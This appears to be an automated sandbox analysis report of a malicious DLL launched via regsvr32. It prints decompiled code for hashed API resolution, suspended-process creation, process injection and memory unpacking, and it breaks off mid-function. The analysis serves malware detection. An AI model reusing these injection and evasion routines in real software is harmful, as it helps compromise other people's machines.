                                                                                                                                                                                              control_flow_graph 259 42aeebb-42aeed2 260 42aef2f 259->260 261 42aeed4-42aeefc 259->261 263 42aef31-42aef35 260->263 261->260 262 42aeefe-42aef21 call 42aa43d call 42ae2c5 261->262 268 42aef23-42aef2d 262->268 269 42aef36-42aef4d 262->269 268->260 268->262 270 42aef4f-42aef57 269->270 271 42aefa3-42aefa5 269->271 270->271 272 42aef59 270->272 271->263 273 42aef5b-42aef61 272->273 274 42aef63-42aef65 273->274 275 42aef71-42aef82 273->275 274->275 276 42aef67-42aef6f 274->276 277 42aef87-42aef93 LoadLibraryA 275->277 278 42aef84-42aef85 275->278 276->273 276->275 277->260 279 42aef95-42aef9f GetProcAddress 277->279 278->277 279->260 280 42aefa1 279->280 280->263
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E042AEEBB(void* __ecx, intOrPtr __edx) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                                                              				char _v92;
                                                                                                                                                                                              				intOrPtr _t41;
                                                                                                                                                                                              				signed int _t47;
                                                                                                                                                                                              				signed int _t49;
                                                                                                                                                                                              				signed int _t51;
                                                                                                                                                                                              				void* _t56;
                                                                                                                                                                                              				struct HINSTANCE__* _t58;
                                                                                                                                                                                              				_Unknown_base(*)()* _t59;
                                                                                                                                                                                              				intOrPtr _t60;
                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                              				intOrPtr _t63;
                                                                                                                                                                                              				void* _t69;
                                                                                                                                                                                              				char _t70;
                                                                                                                                                                                              				void* _t75;
                                                                                                                                                                                              				CHAR* _t80;
                                                                                                                                                                                              				void* _t82;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t75 = __ecx;
                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                              				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                                                                                                                                              				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                                                                                                                                                                                              				if(_t41 == 0) {
                                                                                                                                                                                              					L4:
                                                                                                                                                                                              					return 0;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t62 = _t41 + __ecx;
                                                                                                                                                                                              				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                                                                                                                                                                                              				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                                                                                                                                                                              				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                                                                                                                                                                                              				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                                                                                                                                                                                              				_t47 = 0;
                                                                                                                                                                                              				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                                                                                                                                                                              				_v8 = 0;
                                                                                                                                                                                              				_v16 = _t63;
                                                                                                                                                                                              				if(_t63 == 0) {
                                                                                                                                                                                              					goto L4;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					goto L2;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                              					L2:
                                                                                                                                                                                              					_t49 = E042AE2C5( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E042AA43D( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                                                                                                                                                                                              					_t51 = _v8;
                                                                                                                                                                                              					if((_t49 ^ 0x218fe95b) == _v12) {
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t73 = _v20;
                                                                                                                                                                                              					_t47 = _t51 + 1;
                                                                                                                                                                                              					_v8 = _t47;
                                                                                                                                                                                              					if(_t47 < _v16) {
                                                                                                                                                                                              						continue;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					goto L4;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                                                                                                                                                                                              				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                                                                                                                                                                                              				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
                                                                                                                                                                                              					return _t80;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t56 = 0;
                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                              						_t70 = _t80[_t56];
                                                                                                                                                                                              						if(_t70 == 0x2e || _t70 == 0) {
                                                                                                                                                                                              							break;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                                                                                                                                                                                              						_t56 = _t56 + 1;
                                                                                                                                                                                              						if(_t56 < 0x40) {
                                                                                                                                                                                              							continue;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                                                                                                                                                                                              					 *((char*)(_t82 + _t56 - 0x54)) = 0;
                                                                                                                                                                                              					if( *((char*)(_t56 + _t80)) != 0) {
                                                                                                                                                                                              						_t80 =  &(( &(_t80[1]))[_t56]);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t40 =  &_v92; // 0x6c6c642e
                                                                                                                                                                                              					_t58 = LoadLibraryA(_t40); // executed
                                                                                                                                                                                              					if(_t58 == 0) {
                                                                                                                                                                                              						goto L4;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t59 = GetProcAddress(_t58, _t80);
                                                                                                                                                                                              					if(_t59 == 0) {
                                                                                                                                                                                              						goto L4;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					return _t59;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}


























                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 042AEF8B
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 042AEF97
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                              • String ID: .dll
                                                                                                                                                                                              • API String ID: 2574300362-2738580789
                                                                                                                                                                                              • Opcode ID: 759ffd7343ff5d91bf36cdb4d1ac8ff8b16c373860011482d3f0fde83ce8cdbd
                                                                                                                                                                                              • Instruction ID: 52e2ab8dcdc08d0e1f51b48ae4886c155903d1abefa39317e418cb2488af9c34
                                                                                                                                                                                              • Opcode Fuzzy Hash: 759ffd7343ff5d91bf36cdb4d1ac8ff8b16c373860011482d3f0fde83ce8cdbd
                                                                                                                                                                                              • Instruction Fuzzy Hash: A131B071B601169BCB24CF6DD884AAEBBE5EF44304F294469DC05E7351E7B0F962CB90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 281 42ac7f5-42ac815 GetTokenInformation 282 42ac85b 281->282 283 42ac817-42ac820 GetLastError 281->283 284 42ac85d-42ac861 282->284 283->282 285 42ac822-42ac832 call 42a8bde 283->285 288 42ac838-42ac84b GetTokenInformation 285->288 289 42ac834-42ac836 285->289 288->282 290 42ac84d-42ac859 call 42a8bf4 288->290 289->284 290->289
                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                              			E042AC7F5(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                                                                                                                                                                                              				long _v8;
                                                                                                                                                                                              				void* _v12;
                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                              				void* _t22;
                                                                                                                                                                                              				union _TOKEN_INFORMATION_CLASS _t28;
                                                                                                                                                                                              				void* _t31;
                                                                                                                                                                                              
                                                                                                                                                                                              				_push(_t22);
                                                                                                                                                                                              				_push(_t22);
                                                                                                                                                                                              				_t31 = 0;
                                                                                                                                                                                              				_t28 = __edx;
                                                                                                                                                                                              				_t20 = _t22;
                                                                                                                                                                                              				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                              					L6:
                                                                                                                                                                                              					_t12 = _t31;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t31 = E042A8BDE(_v8);
                                                                                                                                                                                              					_v12 = _t31;
                                                                                                                                                                                              					if(_t31 != 0) {
                                                                                                                                                                                              						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                                                                                                                                                                                              							goto L6;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							E042A8BF4( &_v12, _t16);
                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						L3:
                                                                                                                                                                                              						_t12 = 0;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t12;
                                                                                                                                                                                              			}











                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,042A0000,00000000,00000000,?,042AC876,00000000,00000000,?,042AC89F), ref: 042AC810
                                                                                                                                                                                              • GetLastError.KERNEL32(?,042AC876,00000000,00000000,?,042AC89F,00001644,?,042ADFCE), ref: 042AC817
                                                                                                                                                                                                • Part of subcall function 042A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,042A959D,00000100,?,042A6507), ref: 042A8BEC
                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,042AC876,00000000,00000000,?,042AC89F,00001644,?,042ADFCE), ref: 042AC846
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: InformationToken$AllocateErrorHeapLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2499131667-0
                                                                                                                                                                                              • Opcode ID: 05d22ca633d66eac573b8adb2206c87ad6a3ba4a753e40a59bee172e0479105b
                                                                                                                                                                                              • Instruction ID: 0ca8905b04af5e7ed0085a89dcf8e589c464976220abfba1e8dd58a25cd895a6
                                                                                                                                                                                              • Opcode Fuzzy Hash: 05d22ca633d66eac573b8adb2206c87ad6a3ba4a753e40a59bee172e0479105b
                                                                                                                                                                                              • Instruction Fuzzy Hash: D20184B2710119BFAB216AAADC48DAB7FACFF457A07110469FD05D2110E660ED10C6E0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 293 42abc84-42abcd3 call 42a8d6d * 2 CreateProcessW
                                                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                                                              			E042ABC84(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
                                                                                                                                                                                              				struct _STARTUPINFOW _v72;
                                                                                                                                                                                              				signed int _t11;
                                                                                                                                                                                              
                                                                                                                                                                                              				E042A8D6D(__edx, 0, 0x10);
                                                                                                                                                                                              				E042A8D6D( &_v72, 0, 0x44);
                                                                                                                                                                                              				_v72.cb = 0x44;
                                                                                                                                                                                              				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
                                                                                                                                                                                              				asm("sbb eax, eax");
                                                                                                                                                                                              				return  ~( ~_t11) - 1;
                                                                                                                                                                                              			}






                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 042A8D6D: memset.MSVCRT ref: 042A8D7F
                                                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 042ABCC6
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateProcessmemset
                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                              • API String ID: 2296119082-2746444292
                                                                                                                                                                                              • Opcode ID: ed83407d9e011f10b19b360724e72c13000ac853a9619853be576f438d0904d5
                                                                                                                                                                                              • Instruction ID: 1bda7f56f7c63e887b108923f9b76bc4f24a750b5376de2e9d77ead22108248c
                                                                                                                                                                                              • Opcode Fuzzy Hash: ed83407d9e011f10b19b360724e72c13000ac853a9619853be576f438d0904d5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 36F030F17506087FF720E6699C0AFBF3AACCB41714F500125BA05EB1C0E6A4AD0582A5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 298 82ff20-82ffbe VirtualAlloc call 82fb50 call 82fb90 303 82ffc9-82ffd3 298->303 304 830031-830083 call 82fcd0 303->304 305 82ffd5-82ffdc 303->305 312 8300b1-8300b8 304->312 313 830085-830089 304->313 307 830026-83002f 305->307 308 82ffde-82ffe5 305->308 307->303 308->307 310 82ffe7-830023 call 82fb90 308->310 310->307 316 8300c3-8300cd 312->316 313->312 315 83008b-8300ae call 82fc30 313->315 315->312 319 83011f-830154 call 830440 316->319 320 8300cf-8300d6 316->320 323 830114-83011d 320->323 324 8300d8-8300df 320->324 323->316 324->323 326 8300e1-830112 call 830160 VirtualProtect 324->326 326->323
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0082FF6B
                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000000), ref: 00830112
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.672779315.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_810000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Virtual$AllocProtect
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2447062925-0
                                                                                                                                                                                              • Opcode ID: 908ff1232115a672daceacccd1e388f79e6961393f0a3edebe41de14d0d5fad2
                                                                                                                                                                                              • Instruction ID: d1a9b179b63b648dc6a7c836bce55d66c0e7a0d212eb1d14420f1f3e61ccf768
                                                                                                                                                                                              • Opcode Fuzzy Hash: 908ff1232115a672daceacccd1e388f79e6961393f0a3edebe41de14d0d5fad2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B91B875A00109DFCB48CF98D590EAEB7B5FF88304F148159E915AB346D735EA82CFA1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 330 42ad804-42ad824 call 42ad6dc 333 42ad82a-42ad849 call 42ab557 330->333 334 42ad955-42ad958 330->334 337 42ad84f-42ad851 333->337 338 42ad945-42ad954 call 42a8bf4 333->338 339 42ad933-42ad943 call 42a8bf4 337->339 340 42ad857-42ad859 337->340 338->334 339->338 342 42ad85c-42ad85e 340->342 345 42ad921-42ad92d 342->345 346 42ad864-42ad883 call 42a8d6d call 42abc84 342->346 345->337 345->339 352 42ad8e5-42ad8e9 346->352 353 42ad885-42ad898 call 42ad959 346->353 354 42ad8eb-42ad8ed 352->354 355 42ad914-42ad91b 352->355 353->352 360 42ad89a-42ad8b2 353->360 357 42ad8fe-42ad90e 354->357 358 42ad8ef-42ad8f5 354->358 355->342 355->345 357->355 358->357 363 42ad8e2 360->363 364 42ad8b4-42ad8c9 GetLastError call 42ada57 360->364 363->352 367 42ad8cb-42ad8d6 364->367 368 42ad8de-42ad8df FindCloseChangeNotification 364->368 370 42ad8d8 367->370 371 42ad8d9 367->371 368->363 370->371 371->368
                                                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                                                              			E042AD804(intOrPtr __edx) {
                                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				intOrPtr _v36;
                                                                                                                                                                                              				char _v40;
                                                                                                                                                                                              				char _v80;
                                                                                                                                                                                              				char _t37;
                                                                                                                                                                                              				intOrPtr _t38;
                                                                                                                                                                                              				signed int _t45;
                                                                                                                                                                                              				void* _t49;
                                                                                                                                                                                              				intOrPtr _t50;
                                                                                                                                                                                              				intOrPtr _t52;
                                                                                                                                                                                              				intOrPtr _t54;
                                                                                                                                                                                              				void* _t56;
                                                                                                                                                                                              				intOrPtr _t59;
                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                              				intOrPtr _t63;
                                                                                                                                                                                              				signed int _t67;
                                                                                                                                                                                              				intOrPtr _t69;
                                                                                                                                                                                              				void* _t70;
                                                                                                                                                                                              				intOrPtr _t86;
                                                                                                                                                                                              				char _t87;
                                                                                                                                                                                              				void* _t88;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v16 = _v16 & 0x00000000;
                                                                                                                                                                                              				_v20 = __edx;
                                                                                                                                                                                              				_t86 = 0;
                                                                                                                                                                                              				_t37 = E042AD6DC( &_v16);
                                                                                                                                                                                              				_t87 = _t37;
                                                                                                                                                                                              				_v24 = _t87;
                                                                                                                                                                                              				_t89 = _t87;
                                                                                                                                                                                              				if(_t87 == 0) {
                                                                                                                                                                                              					return _t37;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t38 =  *0x42bf81c; // 0x48efbe8
                                                                                                                                                                                              				_t7 = _t38 + 0xac; // 0x1d290ddf
                                                                                                                                                                                              				E042AB557( &_v80,  *_t7 + 7, _t89);
                                                                                                                                                                                              				_v12 = _v12 & 0;
                                                                                                                                                                                              				_t67 = _v16;
                                                                                                                                                                                              				if(_t67 == 0) {
                                                                                                                                                                                              					L21:
                                                                                                                                                                                              					E042A8BF4( &_v24, 0);
                                                                                                                                                                                              					return _t86;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				while(_t86 == 0) {
                                                                                                                                                                                              					_t69 = 0;
                                                                                                                                                                                              					_v8 = 0;
                                                                                                                                                                                              					while(_t86 == 0) {
                                                                                                                                                                                              						E042A8D6D( &_v40, _t86, 0x10);
                                                                                                                                                                                              						_t88 = _t88 + 0xc;
                                                                                                                                                                                              						_t49 = E042ABC84( *((intOrPtr*)(_t87 + _v12 * 4)),  &_v40); // executed
                                                                                                                                                                                              						_t94 = _t49;
                                                                                                                                                                                              						if(_t49 >= 0) {
                                                                                                                                                                                              							_t56 = E042AD959(E042A61C5,  &_v40, _t94, _v20); // executed
                                                                                                                                                                                              							if(_t56 != 0) {
                                                                                                                                                                                              								_t59 =  *0x42bf818; // 0x48ef8b0
                                                                                                                                                                                              								_t70 =  *((intOrPtr*)(_t59 + 0xd0))(0, 0, 0,  &_v80);
                                                                                                                                                                                              								if(_t70 != 0) {
                                                                                                                                                                                              									GetLastError();
                                                                                                                                                                                              									_t62 = E042ADA57( &_v40);
                                                                                                                                                                                              									_t63 =  *0x42bf818; // 0x48ef8b0
                                                                                                                                                                                              									if(_t62 != 0) {
                                                                                                                                                                                              										_push(0xea60);
                                                                                                                                                                                              										_push(_t70);
                                                                                                                                                                                              										if( *((intOrPtr*)(_t63 + 0x2c))() == 0) {
                                                                                                                                                                                              											_t86 = _t86 + 1;
                                                                                                                                                                                              										}
                                                                                                                                                                                              										_t63 =  *0x42bf818; // 0x48ef8b0
                                                                                                                                                                                              									}
                                                                                                                                                                                              									FindCloseChangeNotification(_t70);
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t69 = _v8;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_v40 != 0) {
                                                                                                                                                                                              							if(_t86 == 0) {
                                                                                                                                                                                              								_t54 =  *0x42bf818; // 0x48ef8b0
                                                                                                                                                                                              								 *((intOrPtr*)(_t54 + 0x110))(_v40, _t86);
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t50 =  *0x42bf818; // 0x48ef8b0
                                                                                                                                                                                              							 *((intOrPtr*)(_t50 + 0x30))(_v36);
                                                                                                                                                                                              							_t52 =  *0x42bf818; // 0x48ef8b0
                                                                                                                                                                                              							 *((intOrPtr*)(_t52 + 0x30))(_v40);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t69 = _t69 + 1;
                                                                                                                                                                                              						_v8 = _t69;
                                                                                                                                                                                              						if(_t69 < 2) {
                                                                                                                                                                                              							continue;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							break;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t67 = _v16;
                                                                                                                                                                                              					_t45 = _v12 + 1;
                                                                                                                                                                                              					_v12 = _t45;
                                                                                                                                                                                              					if(_t45 < _t67) {
                                                                                                                                                                                              						continue;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						goto L20;
                                                                                                                                                                                              					} while (_t67 != 0);
                                                                                                                                                                                              					goto L21;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				L20:
                                                                                                                                                                                              				E042A8BF4(_t87, 0xfffffffe);
                                                                                                                                                                                              				_t87 = _t87 + 4;
                                                                                                                                                                                              				_t67 = _t67 - 1;
                                                                                                                                                                                              			}




























                                                                                                                                                                                              0x042ad933
                                                                                                                                                                                              0x042ad936
                                                                                                                                                                                              0x042ad93c
                                                                                                                                                                                              0x042ad940

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 042A8D6D: memset.MSVCRT ref: 042A8D7F
                                                                                                                                                                                                • Part of subcall function 042ABC84: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 042ABCC6
                                                                                                                                                                                                • Part of subcall function 042AD959: GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 042AD9BB
                                                                                                                                                                                                • Part of subcall function 042AD959: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 042ADA04
                                                                                                                                                                                                • Part of subcall function 042AD959: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 042ADA21
                                                                                                                                                                                                • Part of subcall function 042AD959: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 042ADA42
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000001), ref: 042AD8B4
                                                                                                                                                                                                • Part of subcall function 042ADA57: ResumeThread.KERNELBASE(?,042AD8C2,?,?,00000001), ref: 042ADA5F
                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000001), ref: 042AD8DF
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MemoryVirtual$ProtectThread$ChangeCloseContextCreateErrorFindLastNotificationProcessResumeWritememset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2212882986-0
                                                                                                                                                                                              • Opcode ID: 720cda09a60684dcbd5dda40d159137fa3286a2cfaa6bc453fd8adfb85604bf5
                                                                                                                                                                                              • Instruction ID: f8c5511b1b543f2a12a305e5ec469265f933d824d3cea187b2723e0c5a130d99
                                                                                                                                                                                              • Opcode Fuzzy Hash: 720cda09a60684dcbd5dda40d159137fa3286a2cfaa6bc453fd8adfb85604bf5
                                                                                                                                                                                              • Instruction Fuzzy Hash: B8416E71B2020A9FDB10DFA9E988E9D77FAEF48314F114065E905E7251DB30AE55CB60
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 372 830340-830368 373 830430-830433 372->373 374 83036e-830374 372->374 375 830377-83037e 374->375 375->373 376 830384-8303a6 375->376 378 830422-83042b 376->378 379 8303a8-8303b1 376->379 378->375 380 8303b4-8303ba 379->380 380->378 381 8303bc-8303c4 380->381 382 830417-830420 381->382 383 8303c6-830415 VirtualProtect * 2 381->383 382->380 383->373
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,00000004,00000040,?), ref: 008303DB
                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,00000004,?,?), ref: 00830413
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.672779315.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_810000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                                                              • Opcode ID: 0a894fec6175854ae8b2712809d142e72fa9094a0c42227173d89027c1b642ac
                                                                                                                                                                                              • Instruction ID: 2ea5a997d6b4d8e35bcba8ba64912639b570b4ae94d4d6688ebd95a8956a2ac5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a894fec6175854ae8b2712809d142e72fa9094a0c42227173d89027c1b642ac
                                                                                                                                                                                              • Instruction Fuzzy Hash: E3417674A00209EFCF08CF88C891AEEB7B5FF88318F148199E915AB355D775AA51CF94
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 61%
                                                                                                                                                                                              			_entry_(void* __ecx, intOrPtr _a4, WCHAR* _a8) {
                                                                                                                                                                                              				long _v8;
                                                                                                                                                                                              				intOrPtr _t15;
                                                                                                                                                                                              				WCHAR* _t23;
                                                                                                                                                                                              				long _t24;
                                                                                                                                                                                              				void* _t28;
                                                                                                                                                                                              				void* _t31;
                                                                                                                                                                                              				intOrPtr _t36;
                                                                                                                                                                                              				void* _t41;
                                                                                                                                                                                              				void* _t48;
                                                                                                                                                                                              				intOrPtr* _t49;
                                                                                                                                                                                              
                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                              				if(_a8 != 1) {
                                                                                                                                                                                              					__eflags = _a8;
                                                                                                                                                                                              					if(_a8 != 0) {
                                                                                                                                                                                              						L7:
                                                                                                                                                                                              						__eflags = 1;
                                                                                                                                                                                              						return 1;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t15 =  *0x42bf818; // 0x48ef8b0
                                                                                                                                                                                              					 *((intOrPtr*)(_t15 + 0xb8))(0xaa);
                                                                                                                                                                                              					L3:
                                                                                                                                                                                              					return 0;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				E042A8BC9();
                                                                                                                                                                                              				E042A9591();
                                                                                                                                                                                              				 *0x42bf830 = _a4;
                                                                                                                                                                                              				E042B3CD5(_a4);
                                                                                                                                                                                              				 *_t49 = 0xf43;
                                                                                                                                                                                              				 *0x42bf818 = E042AF05C(0x42bca50, 0x138);
                                                                                                                                                                                              				 *_t49 = 0x111;
                                                                                                                                                                                              				_t23 = E042A9DF2(0x42bca50);
                                                                                                                                                                                              				_pop(_t41);
                                                                                                                                                                                              				_a8 = _t23;
                                                                                                                                                                                              				_t24 = GetFileAttributesW(_t23); // executed
                                                                                                                                                                                              				_push( &_a8);
                                                                                                                                                                                              				if(_t24 == 0xffffffff) {
                                                                                                                                                                                              					E042A8BAF();
                                                                                                                                                                                              					 *_t49 = 0x40e;
                                                                                                                                                                                              					_t28 = E042A9CB5(E042A109A(_t41));
                                                                                                                                                                                              					_a8 = _t28;
                                                                                                                                                                                              					__eflags = _t28;
                                                                                                                                                                                              					if(_t28 != 0) {
                                                                                                                                                                                              						_t48 = 0x54;
